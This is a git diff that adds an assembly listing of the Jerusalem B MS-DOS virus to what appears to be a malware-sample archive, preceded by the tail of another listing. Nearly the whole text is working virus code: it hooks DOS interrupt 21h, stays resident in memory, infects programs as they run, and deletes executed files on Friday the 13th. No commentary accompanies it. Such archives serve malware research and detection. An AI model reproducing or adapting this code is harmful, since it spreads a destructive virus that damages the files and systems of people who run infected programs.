+0000:068D 0000 ADD [BX+SI],AL
+0000:068F 0000 ADD [BX+SI],AL
+0000:0691 0D6B6F OR AX,06F6BH
+0000:0694 6465 JZ X06FB
+0000:0696 6572 JNZ X070A
+0000:0698 7A2E JPE X06C8
+0000:069A 6578 JNZ X0714
+0000:069C 6520 JNZ X06BE
+0000:069E 613A JNO X06DA
+0000:06A0 6B6F JPO X0711
+0000:06A2 6465 JZ X0709
+0000:06A4 6572 JNZ X0718
+0000:06A6 2E6578 JNZ X0721
+0000:06A9 650D JNZ X06B8
+0000:06AB 0000 ADD [BX+SI],AL
+0000:06AD 0000 ADD [BX+SI],AL
+0000:06AF 0000 ADD [BX+SI],AL
+0000:06B1 0000 ADD [BX+SI],AL
+0000:06B3 0000 ADD [BX+SI],AL
+0000:06B5 0000 ADD [BX+SI],AL
+0000:06B7 0000 ADD [BX+SI],AL
+0000:06B9 0000 ADD [BX+SI],AL
+0000:06BB 0000 ADD [BX+SI],AL
+0000:06BD 0000 ADD [BX+SI],AL
+0000:06BF 0000 ADD [BX+SI],AL
+0000:06C1 0000 ADD [BX+SI],AL
+0000:06C3 0000 ADD [BX+SI],AL
+0000:06C5 0000 ADD [BX+SI],AL
+0000:06C7 0000 ADD [BX+SI],AL
+0000:06C9 0000 ADD [BX+SI],AL
+0000:06CB 0000 ADD [BX+SI],AL
+0000:06CD 0000 ADD [BX+SI],AL
+0000:06CF 0000 ADD [BX+SI],AL
+0000:06D1 0000 ADD [BX+SI],AL
+0000:06D3 0000 ADD [BX+SI],AL
+0000:06D5 0000 ADD [BX+SI],AL
+0000:06D7 0000 ADD [BX+SI],AL
+0000:06D9 005718 ADD [BX+018H],DL
+0000:06DC 0825 OR [DI],AH
+0000:06DE A5 MOVSW
+0000:06DF FEC5 INC CH
+0000:06E1 07 POP ES
+0000:06E2 1E PUSH DS
+0000:06E3 0210 ADD DL,[BX+SI]
+0000:06E5 07 POP ES
+0000:06E6 57 PUSH DI
+0000:06E7 18B10D47 SBB [BX+DI+Y0470DH],DH
+0000:06EB 0104 ADD [SI],AX
+0000:06ED 7F70 JG X075F
+
+"JV.MOC" PAGE 0014
+
+0000:06EF 0010 ADD [BX+SI],DL
+0000:06F1 07 POP ES
+0000:06F2 1D001C SBB AX,01C00H
+0000:06F5 09A20D3D OR [BP+SI+Y03D0DH],SP
+0000:06F9 0C1B OR AL,01BH
+0000:06FB 02B10D02 X06FB: ADD DH,[BX+DI+Y020DH]
+0000:06FF F24D REPNE DEC BP
+0000:0701 360E PUSH CS
+0000:0703 0300 ADD AX,[BX+SI]
+0000:0705 0000 ADD [BX+SI],AL
+0000:0707 00EE ADD DH,CH
+0000:0709 002A X0709: ADD [BP+SI],CH
+0000:070B 0F POP CS
+0000:070C 42 INC DX
+0000:070D 01C1 ADD CX,AX
+0000:070F 0DB44C OR AX,04CB4H
+0000:0712 B000 MOV AL,00H
+0000:0714 CD21 X0714: INT 021H
+0000:0716 4D DEC BP
+0000:0717 7344 JAE X075D
+0000:0719 6F73 JG X078E
+
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.jeru-b.lst b/MSDOS/Virus.MSDOS.Unknown.jeru-b.lst
new file mode 100644
index 00000000..556a184d
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.jeru-b.lst
@@ -0,0 +1,794 @@
+This is the Jerusalem B Virus.
+"JV.MOC" PAGE 0001
+
+0000:0000 E99200 JMP X0095
+0000:0003 7355 JAE X005A
+0000:0005 4D DEC BP
+0000:0006 7344 JAE X004C
+0000:0008 6F73 JG X007D
+0000:000A 0001 ADD [BX+DI],AL
+0000:000C BD1700 MOV BP,0017H
+0000:000F 0000 ADD [BX+SI],AL
+0000:0011 06 PUSH ES
+0000:0012 00A5FE00 ADD [DI+Y00FEH],AH
+0000:0016 F016 LOCK PUSH SS
+0000:0018 17 POP SS
+0000:0019 7702 JA X001D
+0000:001B BF053D MOV DI,03D05H
+0000:001E 0CFB OR AL,0FBH
+0000:0020 7D00 JGE X0022
+0000:0022 0000 X0022: ADD [BX+SI],AL
+0000:0024 0000 ADD [BX+SI],AL
+0000:0026 0000 ADD [BX+SI],AL
+0000:0028 0000 ADD [BX+SI],AL
+0000:002A 0000 ADD [BX+SI],AL
+0000:002C 0000 ADD [BX+SI],AL
+0000:002E E8062A CALL X2A37
+0000:0031 B10D MOV CL,0DH
+0000:0033 800000 ADD BYTE PTR [BX+SI],00H
+0000:0036 008000B1 ADD [BX+SI+Y0B100H],AL
+0000:003A 0D5C00 OR AX,005CH
+0000:003D B10D MOV CL,0DH
+0000:003F 6C00 JL X0041
+0000:0041 B10D X0041: MOV CL,0DH
+0000:0043 0004 ADD [SI],AL
+0000:0045 5F POP DI
+0000:0046 0F POP CS
+0000:0047 B400 MOV AH,00H
+0000:0049 C1 RET ; INTRASEGMENT
+0000:004A 0D00F0 X004A: OR AX,0F000H
+0000:004D 06 PUSH ES
+0000:004E 004D5A ADD [DI+05AH],CL
+0000:0051 2000 AND [BX+SI],AL
+0000:0053 1000 ADC [BX+SI],AL
+0000:0055 1900 SBB [BX+SI],AX
+0000:0057 0800 OR [BX+SI],AL
+0000:0059 7500 JNZ X005B
+0000:005B 7500 X005B: JNZ X005D
+0000:005D 6901 X005D: JNS X0060
+0000:005F 1007 ADC [BX],AL
+0000:0061 8419 TEST BL,[BX+DI]
+0000:0063 C500 LDS AX,[BX+SI]
+0000:0065 6901 JNS X0068
+0000:0067 1C00 SBB AL,00H
+0000:0069 0000 ADD [BX+SI],AL
+0000:006B 4C X006B: DEC SP
+0000:006C B000 MOV AL,00H
+0000:006E CD21 INT 021H
+0000:0070 050020 ADD AX,02000H
+0000:0073 0037 ADD [BX],DH
+
+"JV.MOC" PAGE 0002
+
+0000:0075 121C ADC BL,[SI]
+0000:0077 0100 ADD [BX+SI],AX
+0000:0079 0210 ADD DL,[BX+SI]
+0000:007B 0010 ADD [BX+SI],DL
+0000:007D 17 X007D: POP SS
+0000:007E 0000 ADD [BX+SI],AL
+0000:0080 53 PUSH BX
+0000:0081 61E8 JNO X006B
+0000:0083 38434F CMP
[BP+DI+04FH],AL +0000:0086 4D DEC BP +0000:0087 4D DEC BP +0000:0088 41 INC CX +0000:0089 4E DEC SI +0000:008A 44 INC SP +0000:008B 2E43 INC BX +0000:008D 4F DEC DI +0000:008E 4D DEC BP +0000:008F 0100 ADD [BX+SI],AX +0000:0091 0000 ADD [BX+SI],AL +0000:0093 0000 ADD [BX+SI],AL +0000:0095 FC X0095: CLD +0000:0096 B4E0 MOV AH,0E0H +0000:0098 CD21 INT 021H +0000:009A 80FCE0 CMP AH,0E0H +0000:009D 7316 JAE X00B5 +0000:009F 80FC03 CMP AH,03H +0000:00A2 7211 JB X00B5 +0000:00A4 B4DD MOV AH,0DDH +0000:00A6 BF0001 MOV DI,0100H +0000:00A9 BE1007 MOV SI,0710H +0000:00AC 03F7 ADD SI,DI +0000:00AE 2E8B8D1100 MOV CX,CS:[DI+Y0011H] +0000:00B3 CD21 INT 021H +0000:00B5 8CC8 X00B5: MOV AX,CS +0000:00B7 051000 ADD AX,0010H +0000:00BA 8ED0 MOV SS,AX +0000:00BC BC0007 MOV SP,0700H +0000:00BF 50 PUSH AX +0000:00C0 B8C500 MOV AX,00C5H +0000:00C3 50 PUSH AX +0000:00C4 CB RET ; INTERSEGMENT +0000:00C5 FC X00C5: CLD +0000:00C6 06 PUSH ES +0000:00C7 2E8C063100 MOV CS:[Y0031H],ES +0000:00CC 2E8C063900 MOV CS:[Y0039H],ES +0000:00D1 2E8C063D00 MOV CS:[Y003DH],ES +0000:00D6 2E8C064100 MOV CS:[Y0041H],ES +0000:00DB 8CC0 MOV AX,ES +0000:00DD 051000 ADD AX,0010H +0000:00E0 2E01064900 ADD CS:[Y0049H],AX +0000:00E5 2E01064500 ADD CS:[Y0045H],AX +0000:00EA B4E0 MOV AH,0E0H +0000:00EC CD21 INT 021H +0000:00EE 80FCE0 CMP AH,0E0H +0000:00F1 7313 JAE X0106 +0000:00F3 80FC03 CMP AH,03H + +"JV.MOC" PAGE 0003 + +0000:00F6 07 POP ES +0000:00F7 2E8E164500 MOV SS,CS:[Y0045H] +0000:00FC 2E8B264300 MOV SP,CS:[Y0043H] +0000:0101 2EFF2E4700 JMP CS:[Y0047H] +0000:0106 33C0 X0106: XOR AX,AX +0000:0108 8EC0 MOV ES,AX +0000:010A 26A1FC03 MOV AX,ES:Y03FCH +0000:010E 2EA34B00 MOV CS:Y004BH,AX +0000:0112 26A0FE03 MOV AL,ES:Y03FEH +0000:0116 2EA24D00 MOV CS:Y004DH,AL +0000:011A 26C706FC03F3A5 MOV WORD PTR ES:[Y03FCH],0A5F3H +0000:0121 26C606FE03CB MOV BYTE PTR ES:[Y03FEH],0CBH +0000:0127 58 POP AX +0000:0128 051000 ADD AX,0010H +0000:012B 8EC0 MOV ES,AX +0000:012D 0E PUSH CS +0000:012E 1F POP DS +0000:012F B91007 MOV 
CX,0710H +0000:0132 D1E9 SHR CX,1 +0000:0134 33F6 XOR SI,SI +0000:0136 8BFE MOV DI,SI +0000:0138 06 PUSH ES +0000:0139 B84201 MOV AX,0142H +0000:013C 50 PUSH AX +0000:013D EAFC030000 JMP X0000_03FC +0000:0142 8CC8 MOV AX,CS +0000:0144 8ED0 MOV SS,AX +0000:0146 BC0007 MOV SP,0700H +0000:0149 33C0 XOR AX,AX +0000:014B 8ED8 MOV DS,AX +0000:014D 2EA14B00 MOV AX,CS:Y004BH +0000:0151 A3FC03 MOV Y03FCH,AX +0000:0154 2EA04D00 MOV AL,CS:Y004DH +0000:0158 A2FE03 MOV Y03FEH,AL +0000:015B 8BDC MOV BX,SP +0000:015D B104 MOV CL,04H +0000:015F D3EB SHR BX,CL +0000:0161 83C310 ADD BX,0010H +0000:0164 2E891E3300 MOV CS:[Y0033H],BX +0000:0169 B44A MOV AH,04AH +0000:016B 2E8E063100 MOV ES,CS:[Y0031H] +0000:0170 CD21 INT 021H +0000:0172 B82135 MOV AX,03521H +0000:0175 CD21 INT 021H +0000:0177 2E891E1700 MOV CS:[Y0017H],BX +0000:017C 2E8C061900 MOV CS:[Y0019H],ES +0000:0181 0E PUSH CS +0000:0182 1F POP DS +0000:0183 BA5B02 MOV DX,025BH +0000:0186 B82125 MOV AX,02521H +0000:0189 CD21 INT 021H +0000:018B 8E063100 MOV ES,[Y0031H] +0000:018F 268E062C00 MOV ES,ES:[Y002CH] +0000:0194 33FF XOR DI,DI +0000:0196 B9FF7F MOV CX,07FFFH +0000:0199 32C0 XOR AL,AL + +"JV.MOC" PAGE 0004 + +0000:019B F2AE X019B: REPNE SCASB +0000:019D 263805 CMP ES:[DI],AL +0000:01A0 E0F9 LOOPNZ X019B +0000:01A2 8BD7 MOV DX,DI +0000:01A4 83C203 ADD DX,0003H +0000:01A7 B8004B MOV AX,04B00H +0000:01AA 06 PUSH ES +0000:01AB 1F POP DS +0000:01AC 0E PUSH CS +0000:01AD 07 POP ES +0000:01AE BB3500 MOV BX,0035H +0000:01B1 1E PUSH DS +0000:01B2 06 PUSH ES +0000:01B3 50 PUSH AX +0000:01B4 53 PUSH BX +0000:01B5 51 PUSH CX +0000:01B6 52 PUSH DX +0000:01B7 B42A MOV AH,02AH +0000:01B9 CD21 INT 021H +0000:01BB 2EC6060E0000 MOV BYTE PTR CS:[Y000EH],00H +0000:01C1 81F9C307 CMP CX,07C3H +0000:01C5 7430 JZ X01F7 +0000:01C7 3C05 CMP AL,05H +0000:01C9 750D JNZ X01D8 +0000:01CB 80FA0D CMP DL,0DH +0000:01CE 7508 JNZ X01D8 +0000:01D0 2EFE060E00 INC BYTE PTR CS:[Y000EH] +0000:01D5 EB20 JMP X01F7 +0000:01D7 90 NOP +0000:01D8 B80835 X01D8: MOV 
AX,03508H +0000:01DB CD21 INT 021H +0000:01DD 2E891E1300 MOV CS:[Y0013H],BX +0000:01E2 2E8C061500 MOV CS:[Y0015H],ES +0000:01E7 0E PUSH CS +0000:01E8 1F POP DS +0000:01E9 C7061F00907E MOV WORD PTR [Y001FH],07E90H +0000:01EF B80825 MOV AX,02508H +0000:01F2 BA1E02 MOV DX,021EH +0000:01F5 CD21 INT 021H +0000:01F7 5A X01F7: POP DX +0000:01F8 59 POP CX +0000:01F9 5B POP BX +0000:01FA 58 POP AX +0000:01FB 07 POP ES +0000:01FC 1F POP DS +0000:01FD 9C PUSHF +0000:01FE 2EFF1E1700 CALL CS:[Y0017H] +0000:0203 1E PUSH DS +0000:0204 07 POP ES +0000:0205 B449 MOV AH,049H +0000:0207 CD21 INT 021H +0000:0209 B44D MOV AH,04DH +0000:020B CD21 INT 021H +0000:020D B431 MOV AH,031H +0000:020F BA0006 MOV DX,0600H +0000:0212 B104 MOV CL,04H + +"JV.MOC" PAGE 0005 + +0000:0214 D3EA SHR DX,CL +0000:0216 83C210 ADD DX,0010H +0000:0219 CD21 INT 021H +0000:021B 32C0 XOR AL,AL +0000:021D CF IRET +0000:021E 2E833E1F0002 CMP WORD PTR CS:[Y001FH],0002H +0000:0224 7517 JNZ X023D +0000:0226 50 PUSH AX +0000:0227 53 PUSH BX +0000:0228 51 PUSH CX +0000:0229 52 PUSH DX +0000:022A 55 PUSH BP +0000:022B B80206 MOV AX,0602H +0000:022E B787 MOV BH,087H +0000:0230 B90505 MOV CX,0505H +0000:0233 BA1010 MOV DX,01010H +0000:0236 CD10 INT 010H +0000:0238 5D POP BP +0000:0239 5A POP DX +0000:023A 59 POP CX +0000:023B 5B POP BX +0000:023C 58 POP AX +0000:023D 2EFF0E1F00 X023D: DEC WORD PTR CS:[Y001FH] +0000:0242 7512 JNZ X0256 +0000:0244 2EC7061F000100 MOV WORD PTR CS:[Y001FH],0001H +0000:024B 50 PUSH AX +0000:024C 51 PUSH CX +0000:024D 56 PUSH SI +0000:024E B90140 MOV CX,04001H +0000:0251 F3AC REPE LODSB +0000:0253 5E POP SI +0000:0254 59 POP CX +0000:0255 58 POP AX +0000:0256 2EFF2E1300 X0256: JMP CS:[Y0013H] +0000:025B 9C X025B: PUSHF +0000:025C 80FCE0 CMP AH,0E0H +0000:025F 7505 JNZ X0266 +0000:0261 B80003 MOV AX,0300H +0000:0264 9D POPF +0000:0265 CF IRET +0000:0266 80FCDD X0266: CMP AH,0DDH +0000:0269 7413 JZ X027E +0000:026B 80FCDE CMP AH,0DEH +0000:026E 7428 JZ X0298 +0000:0270 3D004B CMP AX,04B00H 
+0000:0273 7503 JNZ X0278 +0000:0275 E9B400 JMP X032C +0000:0278 9D X0278: POPF +0000:0279 2EFF2E1700 JMP CS:[Y0017H] +0000:027E 58 X027E: POP AX +0000:027F 58 POP AX +0000:0280 B80001 MOV AX,0100H +0000:0283 2EA30A00 MOV CS:Y000AH,AX +0000:0287 58 POP AX +0000:0288 2EA30C00 MOV CS:Y000CH,AX +0000:028C F3A4 REPE MOVSB + +"JV.MOC" PAGE 0006 + +0000:028E 9D POPF +0000:028F 2EA10F00 MOV AX,CS:Y000FH +0000:0293 2EFF2E0A00 JMP CS:[Y000AH] +0000:0298 83C406 X0298: ADD SP,0006H +0000:029B 9D POPF +0000:029C 8CC8 MOV AX,CS +0000:029E 8ED0 MOV SS,AX +0000:02A0 BC1007 MOV SP,0710H +0000:02A3 06 PUSH ES +0000:02A4 06 PUSH ES +0000:02A5 33FF XOR DI,DI +0000:02A7 0E PUSH CS +0000:02A8 07 POP ES +0000:02A9 B91000 MOV CX,0010H +0000:02AC 8BF3 MOV SI,BX +0000:02AE BF2100 MOV DI,0021H +0000:02B1 F3A4 REPE MOVSB +0000:02B3 8CD8 MOV AX,DS +0000:02B5 8EC0 MOV ES,AX +0000:02B7 2EF7267A00 MUL WORD PTR CS:[Y007AH] +0000:02BC 2E03062B00 ADD AX,CS:[Y002BH] +0000:02C1 83D200 ADC DX,0000H +0000:02C4 2EF7367A00 DIV WORD PTR CS:[Y007AH] +0000:02C9 8ED8 MOV DS,AX +0000:02CB 8BF2 MOV SI,DX +0000:02CD 8BFA MOV DI,DX +0000:02CF 8CC5 MOV BP,ES +0000:02D1 2E8B1E2F00 MOV BX,CS:[Y002FH] +0000:02D6 0BDB OR BX,BX +0000:02D8 7413 JZ X02ED +0000:02DA B90080 X02DA: MOV CX,08000H +0000:02DD F3A5 REPE MOVSW +0000:02DF 050010 ADD AX,01000H +0000:02E2 81C50010 ADD BP,01000H +0000:02E6 8ED8 MOV DS,AX +0000:02E8 8EC5 MOV ES,BP +0000:02EA 4B DEC BX +0000:02EB 75ED JNZ X02DA +0000:02ED 2E8B0E2D00 X02ED: MOV CX,CS:[Y002DH] +0000:02F2 F3A4 REPE MOVSB +0000:02F4 58 POP AX +0000:02F5 50 PUSH AX +0000:02F6 051000 ADD AX,0010H +0000:02F9 2E01062900 ADD CS:[Y0029H],AX +0000:02FE 2E01062500 ADD CS:[Y0025H],AX +0000:0303 2EA12100 MOV AX,CS:Y0021H +0000:0307 1F POP DS +0000:0308 07 POP ES +0000:0309 2E8E162900 MOV SS,CS:[Y0029H] +0000:030E 2E8B262700 MOV SP,CS:[Y0027H] +0000:0313 2EFF2E2300 JMP CS:[Y0023H] +0000:0318 33C9 X0318: XOR CX,CX +0000:031A B80143 MOV AX,04301H +0000:031D CD21 INT 021H +0000:031F B441 MOV AH,041H 
+0000:0321 CD21 INT 021H + +"JV.MOC" PAGE 0007 + +0000:0323 B8004B MOV AX,04B00H +0000:0326 9D POPF +0000:0327 2EFF2E1700 JMP CS:[Y0017H] +0000:032C 2E803E0E0001 X032C: CMP BYTE PTR CS:[Y000EH],01H +0000:0332 74E4 JZ X0318 +0000:0334 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH +0000:033B 2EC7068F000000 MOV WORD PTR CS:[Y008FH],0000H +0000:0342 2E89168000 MOV CS:[Y0080H],DX +0000:0347 2E8C1E8200 MOV CS:[Y0082H],DS +0000:034C 50 PUSH AX +0000:034D 53 PUSH BX +0000:034E 51 PUSH CX +0000:034F 52 PUSH DX +0000:0350 56 PUSH SI +0000:0351 57 PUSH DI +0000:0352 1E PUSH DS +0000:0353 06 PUSH ES +0000:0354 FC CLD +0000:0355 8BFA MOV DI,DX +0000:0357 32D2 XOR DL,DL +0000:0359 807D013A CMP BYTE PTR [DI+01H],03AH +0000:035D 7505 JNZ X0364 +0000:035F 8A15 MOV DL,[DI] +0000:0361 80E21F AND DL,01FH +0000:0364 B436 X0364: MOV AH,036H +0000:0366 CD21 INT 021H +0000:0368 3DFFFF CMP AX,0FFFFH +0000:036B 7503 JNZ X0370 +0000:036D E97702 X036D: JMP X05E7 +0000:0370 F7E3 X0370: MUL BX +0000:0372 F7E1 MUL CX +0000:0374 0BD2 OR DX,DX +0000:0376 7505 JNZ X037D +0000:0378 3D1007 CMP AX,0710H +0000:037B 72F0 JB X036D +0000:037D 2E8B168000 X037D: MOV DX,CS:[Y0080H] +0000:0382 1E PUSH DS +0000:0383 07 POP ES +0000:0384 32C0 XOR AL,AL +0000:0386 B94100 MOV CX,0041H +0000:0389 F2AE REPNE SCASB +0000:038B 2E8B368000 MOV SI,CS:[Y0080H] +0000:0390 8A04 X0390: MOV AL,[SI] +0000:0392 0AC0 OR AL,AL +0000:0394 740E JZ X03A4 +0000:0396 3C61 CMP AL,061H +0000:0398 7207 JB X03A1 +0000:039A 3C7A CMP AL,07AH +0000:039C 7703 JA X03A1 +0000:039E 802C20 SUB BYTE PTR [SI],020H +0000:03A1 46 X03A1: INC SI +0000:03A2 EBEC JMP X0390 +0000:03A4 B90B00 X03A4: MOV CX,000BH +0000:03A7 2BF1 SUB SI,CX +0000:03A9 BF8400 MOV DI,0084H +0000:03AC 0E PUSH CS + +"JV.MOC" PAGE 0008 + +0000:03AD 07 POP ES +0000:03AE B90B00 MOV CX,000BH +0000:03B1 F3A6 REPE CMPSB +0000:03B3 7503 JNZ X03B8 +0000:03B5 E92F02 JMP X05E7 +0000:03B8 B80043 X03B8: MOV AX,04300H +0000:03BB CD21 INT 021H +0000:03BD 7205 JB X03C4 +0000:03BF 2E890E7200 
MOV CS:[Y0072H],CX +0000:03C4 7225 X03C4: JB X03EB +0000:03C6 32C0 XOR AL,AL +0000:03C8 2EA24E00 MOV CS:Y004EH,AL +0000:03CC 1E PUSH DS +0000:03CD 07 POP ES +0000:03CE 8BFA MOV DI,DX +0000:03D0 B94100 MOV CX,0041H +0000:03D3 F2AE REPNE SCASB +0000:03D5 807DFE4D CMP BYTE PTR [DI-02H],04DH +0000:03D9 740B JZ X03E6 +0000:03DB 807DFE6D CMP BYTE PTR [DI-02H],06DH +0000:03DF 7405 JZ X03E6 +0000:03E1 2EFE064E00 INC BYTE PTR CS:[Y004EH] +0000:03E6 B8003D X03E6: MOV AX,03D00H +0000:03E9 CD21 INT 021H +0000:03EB 725A X03EB: JB X0447 +0000:03ED 2EA37000 MOV CS:Y0070H,AX +0000:03F1 8BD8 MOV BX,AX +0000:03F3 B80242 MOV AX,04202H +0000:03F6 B9FFFF MOV CX,0FFFFH +0000:03F9 BAFBFF MOV DX,0FFFBH +0000:03FC CD21 X03FC: INT 021H +0000:03FE 72EB JB X03EB +0000:0400 050500 ADD AX,0005H +0000:0403 2EA31100 MOV CS:Y0011H,AX +0000:0407 B90500 MOV CX,0005H +0000:040A BA6B00 MOV DX,006BH +0000:040D 8CC8 MOV AX,CS +0000:040F 8ED8 MOV DS,AX +0000:0411 8EC0 MOV ES,AX +0000:0413 B43F MOV AH,03FH +0000:0415 CD21 INT 021H +0000:0417 8BFA MOV DI,DX +0000:0419 BE0500 MOV SI,0005H +0000:041C F3A6 REPE CMPSB +0000:041E 7507 JNZ X0427 +0000:0420 B43E MOV AH,03EH +0000:0422 CD21 INT 021H +0000:0424 E9C001 JMP X05E7 +0000:0427 B82435 X0427: MOV AX,03524H +0000:042A CD21 INT 021H +0000:042C 891E1B00 MOV [Y001BH],BX +0000:0430 8C061D00 MOV [Y001DH],ES +0000:0434 BA1B02 MOV DX,021BH +0000:0437 B82425 MOV AX,02524H +0000:043A CD21 INT 021H +0000:043C C5168000 LDS DX,[Y0080H] + +"JV.MOC" PAGE 0009 + +0000:0440 33C9 XOR CX,CX +0000:0442 B80143 MOV AX,04301H +0000:0445 CD21 INT 021H +0000:0447 723B X0447: JB X0484 +0000:0449 2E8B1E7000 MOV BX,CS:[Y0070H] +0000:044E B43E MOV AH,03EH +0000:0450 CD21 INT 021H +0000:0452 2EC7067000FFFF MOV WORD PTR CS:[Y0070H],0FFFFH +0000:0459 B8023D MOV AX,03D02H +0000:045C CD21 INT 021H +0000:045E 7224 JB X0484 +0000:0460 2EA37000 MOV CS:Y0070H,AX +0000:0464 8CC8 MOV AX,CS +0000:0466 8ED8 MOV DS,AX +0000:0468 8EC0 MOV ES,AX +0000:046A 8B1E7000 MOV BX,[Y0070H] +0000:046E B80057 
MOV AX,05700H +0000:0471 CD21 INT 021H +0000:0473 89167400 MOV [Y0074H],DX +0000:0477 890E7600 MOV [Y0076H],CX +0000:047B B80042 MOV AX,04200H +0000:047E 33C9 XOR CX,CX +0000:0480 8BD1 MOV DX,CX +0000:0482 CD21 INT 021H +0000:0484 723D X0484: JB X04C3 +0000:0486 803E4E0000 CMP BYTE PTR [Y004EH],00H +0000:048B 7403 JZ X0490 +0000:048D EB57 JMP X04E6 +0000:048F 90 NOP +0000:0490 BB0010 X0490: MOV BX,01000H +0000:0493 B448 MOV AH,048H +0000:0495 CD21 INT 021H +0000:0497 730B JAE X04A4 +0000:0499 B43E MOV AH,03EH +0000:049B 8B1E7000 MOV BX,[Y0070H] +0000:049F CD21 INT 021H +0000:04A1 E94301 JMP X05E7 +0000:04A4 FF068F00 X04A4: INC WORD PTR [Y008FH] +0000:04A8 8EC0 MOV ES,AX +0000:04AA 33F6 XOR SI,SI +0000:04AC 8BFE MOV DI,SI +0000:04AE B91007 MOV CX,0710H +0000:04B1 F3A4 REPE MOVSB +0000:04B3 8BD7 MOV DX,DI +0000:04B5 8B0E1100 MOV CX,[Y0011H] +0000:04B9 8B1E7000 MOV BX,[Y0070H] +0000:04BD 06 PUSH ES +0000:04BE 1F POP DS +0000:04BF B43F MOV AH,03FH +0000:04C1 CD21 INT 021H +0000:04C3 721C X04C3: JB X04E1 +0000:04C5 03F9 ADD DI,CX +0000:04C7 33C9 XOR CX,CX +0000:04C9 8BD1 MOV DX,CX +0000:04CB B80042 MOV AX,04200H +0000:04CE CD21 INT 021H + +"JV.MOC" PAGE 0010 + +0000:04D0 BE0500 MOV SI,0005H +0000:04D3 B90500 MOV CX,0005H +0000:04D6 F32EA4 REPE MOVS ES:BYTE PTR (DI),CS:BYTE PT + R (SI) +0000:04D9 8BCF MOV CX,DI +0000:04DB 33D2 XOR DX,DX +0000:04DD B440 MOV AH,040H +0000:04DF CD21 INT 021H +0000:04E1 720D X04E1: JB X04F0 +0000:04E3 E9BC00 JMP X05A2 +0000:04E6 B91C00 X04E6: MOV CX,001CH +0000:04E9 BA4F00 MOV DX,004FH +0000:04EC B43F MOV AH,03FH +0000:04EE CD21 INT 021H +0000:04F0 724A X04F0: JB X053C +0000:04F2 C70661008419 MOV WORD PTR [Y0061H],01984H +0000:04F8 A15D00 MOV AX,Y005DH +0000:04FB A34500 MOV Y0045H,AX +0000:04FE A15F00 MOV AX,Y005FH +0000:0501 A34300 MOV Y0043H,AX +0000:0504 A16300 MOV AX,Y0063H +0000:0507 A34700 MOV Y0047H,AX +0000:050A A16500 MOV AX,Y0065H +0000:050D A34900 MOV Y0049H,AX +0000:0510 A15300 MOV AX,Y0053H +0000:0513 833E510000 CMP WORD PTR 
[Y0051H],0000H +0000:0518 7401 JZ X051B +0000:051A 48 DEC AX +0000:051B F7267800 X051B: MUL WORD PTR [Y0078H] +0000:051F 03065100 ADD AX,[Y0051H] +0000:0523 83D200 ADC DX,0000H +0000:0526 050F00 ADD AX,000FH +0000:0529 83D200 ADC DX,0000H +0000:052C 25F0FF AND AX,0FFF0H +0000:052F A37C00 MOV Y007CH,AX +0000:0532 89167E00 MOV [Y007EH],DX +0000:0536 051007 ADD AX,0710H +0000:0539 83D200 ADC DX,0000H +0000:053C 723A X053C: JB X0578 +0000:053E F7367800 DIV WORD PTR [Y0078H] +0000:0542 0BD2 OR DX,DX +0000:0544 7401 JZ X0547 +0000:0546 40 INC AX +0000:0547 A35300 X0547: MOV Y0053H,AX +0000:054A 89165100 MOV [Y0051H],DX +0000:054E A17C00 MOV AX,Y007CH +0000:0551 8B167E00 MOV DX,[Y007EH] +0000:0555 F7367A00 DIV WORD PTR [Y007AH] +0000:0559 2B065700 SUB AX,[Y0057H] +0000:055D A36500 MOV Y0065H,AX +0000:0560 C7066300C500 MOV WORD PTR [Y0063H],00C5H +0000:0566 A35D00 MOV Y005DH,AX +0000:0569 C7065F001007 MOV WORD PTR [Y005FH],0710H +0000:056F 33C9 XOR CX,CX +0000:0571 8BD1 MOV DX,CX +0000:0573 B80042 MOV AX,04200H +0000:0576 CD21 INT 021H + +"JV.MOC" PAGE 0011 + +0000:0578 720A X0578: JB X0584 +0000:057A B91C00 MOV CX,001CH +0000:057D BA4F00 MOV DX,004FH +0000:0580 B440 MOV AH,040H +0000:0582 CD21 INT 021H +0000:0584 7211 X0584: JB X0597 +0000:0586 3BC1 CMP AX,CX +0000:0588 7518 JNZ X05A2 +0000:058A 8B167C00 MOV DX,[Y007CH] +0000:058E 8B0E7E00 MOV CX,[Y007EH] +0000:0592 B80042 MOV AX,04200H +0000:0595 CD21 INT 021H +0000:0597 7209 X0597: JB X05A2 +0000:0599 33D2 XOR DX,DX +0000:059B B91007 MOV CX,0710H +0000:059E B440 MOV AH,040H +0000:05A0 CD21 INT 021H +0000:05A2 2E833E8F0000 X05A2: CMP WORD PTR CS:[Y008FH],0000H +0000:05A8 7404 JZ X05AE +0000:05AA B449 MOV AH,049H +0000:05AC CD21 INT 021H +0000:05AE 2E833E7000FF X05AE: CMP WORD PTR CS:[Y0070H],0FFFFH +0000:05B4 7431 JZ X05E7 +0000:05B6 2E8B1E7000 MOV BX,CS:[Y0070H] +0000:05BB 2E8B167400 MOV DX,CS:[Y0074H] +0000:05C0 2E8B0E7600 MOV CX,CS:[Y0076H] +0000:05C5 B80157 MOV AX,05701H +0000:05C8 CD21 INT 021H +0000:05CA B43E MOV 
AH,03EH +0000:05CC CD21 INT 021H +0000:05CE 2EC5168000 LDS DX,CS:[Y0080H] +0000:05D3 2E8B0E7200 MOV CX,CS:[Y0072H] +0000:05D8 B80143 MOV AX,04301H +0000:05DB CD21 INT 021H +0000:05DD 2EC5161B00 LDS DX,CS:[Y001BH] +0000:05E2 B82425 MOV AX,02524H +0000:05E5 CD21 INT 021H +0000:05E7 07 X05E7: POP ES +0000:05E8 1F POP DS +0000:05E9 5F POP DI +0000:05EA 5E POP SI +0000:05EB 5A POP DX +0000:05EC 59 POP CX +0000:05ED 5B POP BX +0000:05EE 58 POP AX +0000:05EF 9D POPF +0000:05F0 2EFF2E1700 JMP CS:[Y0017H] +0000:05F5 0000 X05F5: ADD [BX+SI],AL +0000:05F7 0000 ADD [BX+SI],AL +0000:05F9 0000 ADD [BX+SI],AL +0000:05FB 0000 ADD [BX+SI],AL +0000:05FD 0000 ADD [BX+SI],AL +0000:05FF 004D00 ADD [DI+00H],CL +0000:0602 000F ADD [BX],CL +0000:0604 0000 ADD [BX+SI],AL +0000:0606 0000 ADD [BX+SI],AL + +"JV.MOC" PAGE 0012 + +0000:0608 0000 ADD [BX+SI],AL +0000:060A 0000 ADD [BX+SI],AL +0000:060C 0000 ADD [BX+SI],AL +0000:060E 0000 ADD [BX+SI],AL +0000:0610 CD20 INT 020H +0000:0612 00A0009A ADD [BX+SI+Y09A00H],AH 